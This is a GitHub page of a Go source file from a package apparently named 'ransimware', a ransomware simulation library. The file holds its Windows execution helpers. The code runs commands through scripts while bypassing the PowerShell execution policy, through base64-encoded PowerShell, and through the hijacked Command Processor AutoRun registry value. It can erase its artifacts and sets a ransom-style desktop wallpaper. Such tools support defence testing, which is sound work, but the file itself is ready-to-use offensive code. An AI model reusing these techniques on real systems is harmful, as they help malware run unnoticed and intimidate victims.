-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathutils_windows.go
361 lines (307 loc) · 6.96 KB
/
utils_windows.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
//go:build windows
package ransimware
import (
"encoding/base64"
"encoding/binary"
"os"
"os/exec"
"path/filepath"
"strings"
"unsafe"
"golang.org/x/sys/windows"
"golang.org/x/sys/windows/registry"
"github.com/mjwhitta/errors"
)
func executeBat(
name string,
cmds []string,
clean bool,
) (string, error) {
var e error
var o []byte
// Create bat script
if e = writeScript(name, cmds); e != nil {
return "", e
}
// Run bat script
o, e = exec.Command(name).Output()
// Clean up, if requested
if clean {
os.Remove(name)
}
// Check for error
if e != nil {
return "", errors.Newf("command \"%s\" failed: %w", name, e)
}
return strings.TrimSpace(string(o)), nil
}
func executePS1(
name string,
cmds []string,
clean bool,
) (string, error) {
var e error
var o []byte
var old string
// Create ps1 script
if e = writeScript(name, cmds); e != nil {
return "", e
}
if clean {
old, _ = executeShell(
"powershell",
[]string{"Get-ExecutionPolicy -Scope CurrentUser"},
)
}
// Allow unsigned scripts to run
_, e = executeShell(
"powershell",
[]string{"Set-ExecutionPolicy -Scope CurrentUser Bypass"},
)
if e != nil {
return "", e
}
// Run ps1 script
o, e = exec.Command("powershell", "-File", name).Output()
// Clean up, if requested
if clean {
os.Remove(name)
// Restore old policy, or try
if old != "" {
executeShell(
"powershell",
[]string{
"Set-ExecutionPolicy -Scope CurrentUser " + old,
},
)
}
}
// Check for error
if e != nil {
return "", errors.Newf("command \"%s\" failed: %w", name, e)
}
return strings.TrimSpace(string(o)), nil
}
func executeRegistry(cmds []string, clean bool) (string, error) {
var e error
var found bool
var k registry.Key
var o []byte
var old string
var out []string
// Create key
k, found, e = registry.CreateKey(
registry.CURRENT_USER,
filepath.Join("Software", "Microsoft", "Command Processor"),
registry.QUERY_VALUE|registry.SET_VALUE,
)
if e != nil {
return "", e
}
// Get old value
if found {
old, _, _ = k.GetStringValue("AutoRun")
}
for _, cmd := range cmds {
// Set new value
if e = k.SetStringValue("AutoRun", cmd); e != nil {
return "", e
}
// Run cmd
o, e = exec.Command("cmd", "/C", "echo off").Output()
if e != nil {
return strings.Join(out, "\n"), e
}
out = append(out, strings.TrimSpace(string(o)))
}
if !clean {
return strings.Join(out, "\n"), nil
}
// Clean up if requested
if !found {
// Delete key if not found
e = registry.DeleteKey(
registry.CURRENT_USER,
filepath.Join(
"Software",
"Microsoft",
"Command Processor",
),
)
if e != nil {
return strings.Join(out, "\n"), e
}
} else if old != "" {
// Restore old value
if e = k.SetStringValue("AutoRun", old); e != nil {
return strings.Join(out, "\n"), e
}
} else {
// Delete new value if no old value
if e = k.DeleteValue("AutoRun"); e != nil {
return strings.Join(out, "\n"), e
}
}
return strings.Join(out, "\n"), nil
}
// ExecuteScript will run shell commands using the provided method, as
// well as attempt to clean up artifacts, if requested.
func ExecuteScript(
method string,
clean bool,
cmds ...string,
) (string, error) {
if len(cmds) == 0 {
return "", nil
}
switch method {
case "b64powershell":
return executeShell("b64powershell", cmds)
case "bat":
return executeBat(cmds[0], cmds[1:], clean)
case "cmd", "shell":
return executeShell("cmd", cmds)
case "powershell":
return executeShell("powershell", cmds)
case "ps1":
return executePS1(cmds[0], cmds[1:], clean)
case "registry":
return executeRegistry(cmds, clean)
default:
return "", errors.Newf("unsupported method: %s", method)
}
}
func executeShell(shell string, cmds []string) (string, error) {
var b64 string
var e error
var flag string
var o []byte
var out []string
var tmp string
var utf8 []byte
var utf16 []uint16
switch shell {
case "b64powershell":
for _, cmd := range cmds {
tmp += strings.TrimSpace(cmd)
if !strings.HasSuffix(tmp, "{") &&
!strings.HasSuffix(tmp, ";") {
tmp += ";"
}
}
if utf16, e = windows.UTF16FromString(tmp); e != nil {
e = errors.Newf(
"failed to convert %s to Windows type: %w",
tmp,
e,
)
return "", e
}
utf8 = make([]byte, 2*len(utf16)-2)
for i, b16 := range utf16[:len(utf16)-1] {
binary.LittleEndian.PutUint16(utf8[2*i:2*(i+1)], b16)
}
b64 = base64.StdEncoding.EncodeToString(utf8)
cmds = []string{b64}
flag = "-e"
shell = "powershell"
case "cmd":
flag = "/C"
case "powershell":
flag = "-c"
default:
return "", errors.Newf("unsupported shell: %s", shell)
}
// Run cmds
for _, cmd := range cmds {
if o, e = exec.Command(shell, flag, cmd).Output(); e != nil {
e = errors.Newf("command \"%s\" failed: %w", cmd, e)
return strings.Join(out, "\n"), e
}
if len(o) > 0 {
out = append(out, strings.TrimSpace(string(o)))
}
}
return strings.Join(out, "\n"), nil
}
// WallpaperNotify is a NotifyFunc that sets the background wallpaper.
func WallpaperNotify(
img string,
png []byte,
fit string,
clean bool,
) NotifyFunc {
return func() error {
var e error
var f *os.File
var k registry.Key
var spiSetdeskwallpaper uintptr = 0x0014
var spifSendchange uintptr = 0x0002
var spifUpdateinifile uintptr = 0x0001
var user32 *windows.LazyDLL
// Write PNG to file
if f, e = os.Create(img); e != nil {
return errors.Newf("failed to create %s: %w", img, e)
}
if _, e = f.Write(png); e != nil {
return errors.Newf("failed to write to %s: %w", img, e)
}
f.Close()
// Get key
k, _, e = registry.CreateKey(
registry.CURRENT_USER,
filepath.Join("Control Panel", "Desktop"),
registry.SET_VALUE,
)
if e != nil {
return errors.Newf("failed to get registry key: %w", e)
}
// Set wallpaper
if e = k.SetStringValue("WallPaper", img); e != nil {
return errors.Newf("failed to set wallpaper key: %w", e)
}
// Set style
if e = k.SetStringValue("WallpaperStyle", fit); e != nil {
return errors.Newf("failed to set style key: %w", e)
}
// Set tiling
switch fit {
case DesktopTile:
e = k.SetStringValue("TileWallpaper", "1")
default:
e = k.SetStringValue("TileWallpaper", "0")
}
if e != nil {
return errors.Newf("failed to set tile key: %w", e)
}
// Change background with Windows API, or try
user32 = windows.NewLazySystemDLL("User32")
user32.NewProc("SystemParametersInfoA").Call(
spiSetdeskwallpaper,
0,
uintptr(unsafe.Pointer(&[]byte(img)[0])),
spifSendchange|spifUpdateinifile,
)
// Remove image file, if requested
if clean {
os.Remove(img)
}
return nil
}
}
func writeScript(name string, cmds []string) error {
var e error
var f *os.File
// Open script
if f, e = os.Create(name); e != nil {
return errors.Newf("failed to create %s: %w", name, e)
}
defer f.Close()
// Write script
for _, cmd := range cmds {
if _, e = f.WriteString(cmd + "\n"); e != nil {
return errors.Newf("failed to write to %s: %w", name, e)
}
}
return nil
}